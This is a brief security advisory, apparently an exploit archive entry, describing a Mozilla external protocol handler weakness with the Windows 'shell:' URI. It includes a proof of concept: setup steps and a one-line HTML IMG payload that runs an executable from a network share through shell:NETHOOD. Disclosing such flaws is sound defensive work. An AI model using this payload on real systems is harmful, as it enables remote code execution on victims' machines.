|
Mozilla External Protocol Handler Weakness
There is no exploit required. Liu Die Yu has supplied a proof of concept for a 'shell:' URI remote file execution vector: 1. VICTIM VISITS A SHARED FOLDER NAMED "shared" ON A SERVER NAMED "X-6487ohu4s6x0p". THIS WILL CREATE A SHORTCUT NAMED "shared on X-6487ohu4s6x0p" IN THE FOLDER AT "shell:NETHOOD" 2. VICTIM OPENS THIS HTML FILE WHICH EXECUTES A FILE NAMED "fileid.exe" IN THE "shared" FOLDER: <IMG SRC="shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe"> |
|
|
Privacy Statement |